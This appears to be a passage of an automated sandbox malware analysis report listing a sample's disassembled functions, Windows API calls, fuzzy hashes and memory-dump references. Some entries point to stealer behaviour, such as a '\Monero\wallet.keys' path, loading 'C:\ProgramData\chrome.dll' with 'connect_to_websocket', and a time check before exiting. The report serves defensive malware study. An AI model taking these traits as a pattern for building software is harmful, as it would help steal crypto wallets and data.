                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$CloseOpenQueryValue
                                    • String ID:
                                    • API String ID: 690832082-0
                                    • Opcode ID: 9fc0827a8ef54c458c5fb745d626a7ba34f472919708ccd24975c7c115d64759
                                    • Instruction ID: 469b81a2e9e81bd744a0d1f104f65eddff3981658a76e17c704d09ce8cf95abb
                                    • Opcode Fuzzy Hash: 9fc0827a8ef54c458c5fb745d626a7ba34f472919708ccd24975c7c115d64759
                                    • Instruction Fuzzy Hash: B941B7B69102086BDF14FBA0EC56FEE733DAB88300F40455CB7155B581EE7557888BD1
                                    Function 006FCBE2 Relevance: 7.6, APIs: 5, Instructions: 87COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: dllmain_raw$dllmain_crt_dispatch
                                    • String ID:
                                    • API String ID: 3136044242-0
                                    • Opcode ID: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                                    • Instruction ID: 0b416db52ce28384b7257233a903152d2ff28a545c018d895b7650d4a28dbc68
                                    • Opcode Fuzzy Hash: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                                    • Instruction Fuzzy Hash: 17218C72D4062DABDB619F59CE41EBF3A7BEB81BB0F054119FA19A7351C3308D418BA0
                                    Function 00696BC0 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetSystemTime.KERNEL32(?), ref: 00696C0C
                                    • sscanf.NTDLL ref: 00696C39
                                    • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00696C52
                                    • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00696C60
                                    • ExitProcess.KERNEL32 ref: 00696C7A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Time$System$File$ExitProcesssscanf
                                    • String ID:
                                    • API String ID: 2533653975-0
                                    • Opcode ID: 26fbcd5040f456fad6ad1b85411e0edf7bdd10786f44eba499bcb548dd4c6943
                                    • Instruction ID: 58fba1d3cc558558da91f25d69f2992f9635490c4e6d29fb8506b0f0ae27d609
                                    • Opcode Fuzzy Hash: 26fbcd5040f456fad6ad1b85411e0edf7bdd10786f44eba499bcb548dd4c6943
                                    • Instruction Fuzzy Hash: B121CD75D142089BCF44DFE4E8459EEB7BABF48301F04856DF516A3650EB349608CB69
                                    Function 00697F90 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00697FC7
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00697FCE
                                    • RegOpenKeyExA.ADVAPI32(80000002,0141B888,00000000,00020119,?), ref: 00697FEE
                                    • RegQueryValueExA.ADVAPI32(?,0142D098,00000000,00000000,000000FF,000000FF), ref: 0069800F
                                    • RegCloseKey.ADVAPI32(?), ref: 00698022
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID:
                                    • API String ID: 3225020163-0
                                    • Opcode ID: c15fd3e527974fb183ddb169545e842ab095d7c99bc49ee63d50b434673c93cc
                                    • Instruction ID: 8b6a3de140399f0496b6d233ae84eeeafc7a4bcf46beb12f4effdf9ebc0fd012
                                    • Opcode Fuzzy Hash: c15fd3e527974fb183ddb169545e842ab095d7c99bc49ee63d50b434673c93cc
                                    • Instruction Fuzzy Hash: 75118CB1A48305AFEB00CFD5ED46FAFBBBCEB44B11F104219F615A7680DB7559009BA1
                                    Function 006993F0 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • StrStrA.SHLWAPI(0142DCE0,00000000,00000000,?,00689F71,00000000,0142DCE0,00000000), ref: 006993FC
                                    • lstrcpyn.KERNEL32(00957580,0142DCE0,0142DCE0,?,00689F71,00000000,0142DCE0), ref: 00699420
                                    • lstrlen.KERNEL32(00000000,?,00689F71,00000000,0142DCE0), ref: 00699437
                                    • wsprintfA.USER32 ref: 00699457
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpynlstrlenwsprintf
                                    • String ID: %s%s
                                    • API String ID: 1206339513-3252725368
                                    • Opcode ID: 7e3fbdcb1bb698e36182dcf2129cf3bf5c94c50d93372278e4f1315511f36ec5
                                    • Instruction ID: b1fe6024a7523399070262688a0e948c0fffa8d0119f7a710cd43f626982bc07
                                    • Opcode Fuzzy Hash: 7e3fbdcb1bb698e36182dcf2129cf3bf5c94c50d93372278e4f1315511f36ec5
                                    • Instruction Fuzzy Hash: 81011E75508208FFCB04DFE9D948EAEBBB9EB48705F108248F9098B240D631AB45DB90
                                    Function 006812A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 006812B4
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 006812BB
                                    • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 006812D7
                                    • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 006812F5
                                    • RegCloseKey.ADVAPI32(?), ref: 006812FF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID:
                                    • API String ID: 3225020163-0
                                    • Opcode ID: e48ee1c2415e22b642129a6faf22e6d0d235d1661d18552b342205dcc7a8b3da
                                    • Instruction ID: 5f96fd8f286ed306ab2b0cc307b15a91a953ee68fcb22572d1ff6e37a2a687a7
                                    • Opcode Fuzzy Hash: e48ee1c2415e22b642129a6faf22e6d0d235d1661d18552b342205dcc7a8b3da
                                    • Instruction Fuzzy Hash: 8E011D79A58309BFDB00DFE1EC49FAEB77CAB48701F004194FA1597280DA709B009B90
                                    Function 0069CB7E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: String___crt$Type
                                    • String ID:
                                    • API String ID: 2109742289-3916222277
                                    • Opcode ID: 808df0ab09aefaa921b89f5589ff04b2565168eefd93f98b8283ab99567a843a
                                    • Instruction ID: aae14d741fcf3948810b25facb857507d85380f837a091b51ee73c57127e0056
                                    • Opcode Fuzzy Hash: 808df0ab09aefaa921b89f5589ff04b2565168eefd93f98b8283ab99567a843a
                                    • Instruction Fuzzy Hash: 244125B010078C9EDF318B248D85FFB7FEE9B45314F1444ECE98A97582D2319A459F60
                                    Function 006968D0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00696903
                                      • Part of subcall function 0069AA50: lstrcpy.KERNEL32(006A0E1A,00000000), ref: 0069AA98
                                      • Part of subcall function 0069ACC0: lstrlen.KERNEL32(?,01428E68,?,\Monero\wallet.keys,006A0E1A), ref: 0069ACD5
                                      • Part of subcall function 0069ACC0: lstrcpy.KERNEL32(00000000), ref: 0069AD14
                                      • Part of subcall function 0069ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AD22
                                      • Part of subcall function 0069ABB0: lstrcpy.KERNEL32(?,006A0E1A), ref: 0069AC15
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 006969C6
                                    • ExitProcess.KERNEL32 ref: 006969F5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                    • String ID: <
                                    • API String ID: 1148417306-4251816714
                                    • Opcode ID: c968a11001954d91a25473a1b4f347f39acfdf7013a9b7c8ddb0d717e9463e73
                                    • Instruction ID: 3594d02d875b7c339f030d41cbf2176c0350fa52c9154de768223e097b326467
                                    • Opcode Fuzzy Hash: c968a11001954d91a25473a1b4f347f39acfdf7013a9b7c8ddb0d717e9463e73
                                    • Instruction Fuzzy Hash: E6313AB1911218ABDB54EB90DC92FDEB7BDAF18300F404188F205A7591DF746B48CFA9
                                    Function 00698950 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,006A0E10,00000000,?), ref: 006989BF
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 006989C6
                                    • wsprintfA.USER32 ref: 006989E0
                                      • Part of subcall function 0069AA50: lstrcpy.KERNEL32(006A0E1A,00000000), ref: 0069AA98
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateProcesslstrcpywsprintf
                                    • String ID: %dx%d
                                    • API String ID: 1695172769-2206825331
                                    • Opcode ID: 473da4563922040e6d24d9e6d0cb1bf27c02f97a525cecdb25f582bf43142d5a
                                    • Instruction ID: cc276620ab1b692937b2d09c9c2e52eadba1fb466bc2af007d3cd699d266aaf5
                                    • Opcode Fuzzy Hash: 473da4563922040e6d24d9e6d0cb1bf27c02f97a525cecdb25f582bf43142d5a
                                    • Instruction Fuzzy Hash: 442172B1A58304AFDB00DFD5ED45FAEBBB8FB49711F104119F615A7280C775A900CBA0
                                    Function 0068A090 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34libraryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 0068A098
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: LibraryLoad
                                    • String ID: C:\ProgramData\chrome.dll$connect_to_websocket$free_result
                                    • API String ID: 1029625771-1545816527
                                    • Opcode ID: 1f5abc140a8f2aeb6fc872bd4f3eb322084d1948080d368484b0df65dbfa73b6
                                    • Instruction ID: 9db886440e592fd5146eab063075c7c2c1fff1e606f4a29952881203eb77e52c
                                    • Opcode Fuzzy Hash: 1f5abc140a8f2aeb6fc872bd4f3eb322084d1948080d368484b0df65dbfa73b6
                                    • Instruction Fuzzy Hash: FAF01D7066C304AFE700BBF6FC4CB66B2E6E30A302F000555E405972D0C3B59A84EF52
                                    Function 00698EE0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,006996AE,00000000), ref: 00698EEB
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00698EF2
                                    • wsprintfW.USER32 ref: 00698F08
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
